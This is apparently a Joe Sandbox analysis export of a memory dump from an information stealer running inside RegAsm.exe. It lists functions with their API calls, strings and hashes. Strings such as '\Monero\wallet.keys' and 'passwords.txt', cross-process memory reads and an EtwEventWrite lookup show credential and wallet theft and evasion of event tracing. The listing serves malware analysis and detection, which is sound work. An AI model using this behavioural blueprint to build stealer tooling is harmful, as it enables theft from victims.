Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 0041260C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004127B1
_memset.LIBCMT ref: 004128B7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932

Strings

.exe, xrefs: 0041264F
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 004127DB
EMPTY, xrefs: 0041283A

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$ObjectSingleWait
String ID: .exe$EMPTY$b26735cbe8ca9e75712ffe3aa40c4a60
API String ID: 12478032-1726762705
Opcode ID: da98412cd0fca0d2dacfb30b786c0da5571b21292ec69777b9e3a3bd8ecb39d3
Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
Opcode Fuzzy Hash: da98412cd0fca0d2dacfb30b786c0da5571b21292ec69777b9e3a3bd8ecb39d3
Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58

Function 0040DB7F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlenstrchr$strcpy_s
String ID: 0123456789ABCDEF
API String ID: 1957064729-2554083253
Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 0041FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FA6D
DName::operator+.LIBCMT ref: 0041FA74
DName::DName.LIBCMT ref: 0041FA96
DName::operator+.LIBCMT ref: 0041FA9D
DName::operator+.LIBCMT ref: 0041FAA4

Strings

throw(, xrefs: 0041FA65, 0041FA8E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C

Function 0041BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083

Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041B9C5

Strings

'oA, xrefs: 0041BFD6

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 'oA
API String ID: 3986731826-570265369
Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799

Function 00425713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425721
_free.LIBCMT ref: 00425734

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C

Function 00426719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426725

Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964

__getptd.LIBCMT ref: 0042673C
__amsg_exit.LIBCMT ref: 0042674A
__lock.LIBCMT ref: 0042675A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042676E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D

Function 004135A8 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: false$true
API String ID: 3330995566-2658103896
Opcode ID: a18d29ee398d6b1f39d97ebb51de1a74a8bbd1f5cfece70202c7ebcd8168d57f
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a18d29ee398d6b1f39d97ebb51de1a74a8bbd1f5cfece70202c7ebcd8168d57f
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 0040826D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307

Strings

ERROR_RUN_EXTRACTOR, xrefs: 004082BE
v10, xrefs: 004082CE
v20, xrefs: 00408286

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 2102423945-380572819
Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99

Function 004139C2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004139F3
strtok_s.MSVCRT ref: 00413B34

Strings

DwA, xrefs: 004139EC, 004139EF
block, xrefs: 004139CB

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: DwA$block
API String ID: 3330995566-4170876926
Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

EtwEventWrite, xrefs: 004018C5
ntdll.dll, xrefs: 004018B5

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D

Function 00425141 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00425174
_siglookup.LIBCMT ref: 0042519B
DecodePointer.KERNEL32(00000000), ref: 004251F3
__lock.LIBCMT ref: 0042521A

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID:
API String ID: 2847133137-0
Opcode ID: 77078d732e8db2f3057a63753f0641dcf993b0cab592a8a63a99ae8e35919d99
Instruction ID: 069d67ce00bac186bc9f3ac32ad7eb6d288c3b8fedd6e0a8a483a63bcb82f46d
Opcode Fuzzy Hash: 77078d732e8db2f3057a63753f0641dcf993b0cab592a8a63a99ae8e35919d99
Instruction Fuzzy Hash: 37415C70F00A25DBCB289F68E884AADB6B0FF45315BA4416BE801A7391C73D9D51CF6D

Function 0041BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BDC5
_memmove.LIBCMT ref: 0041BDD9
_memmove.LIBCMT ref: 0041BE26
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0041AE6B,?,00000001,?,?,?), ref: 0041BE45

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98

Function 0040A916 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 211COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB

Strings

pe, xrefs: 0040A931
passwords.txt, xrefs: 0040AB89

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: passwords.txt$pe
API String ID: 3555123492-1761351166
Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 00401AB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3287460435-3586502688
Opcode ID: 9359cae915823e38a0877a8fcf4fce719fd494ef31168c192ff5b89dc772d858
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: 9359cae915823e38a0877a8fcf4fce719fd494ef31168c192ff5b89dc772d858
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateCreateHeapProcess_memset
String ID: .exe
API String ID: 4288379676-4119554291
Opcode ID: c5ea114bd9cd131b3ee94c2003750d59ae2b1dadeeb3c1c87c17010cbf83333b
Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
Opcode Fuzzy Hash: c5ea114bd9cd131b3ee94c2003750d59ae2b1dadeeb3c1c87c17010cbf83333b
Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9

Function 00413390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
strtok_s.MSVCRT ref: 00413424

Strings

"xA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: "xA
API String ID: 3330995566-582338916
Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
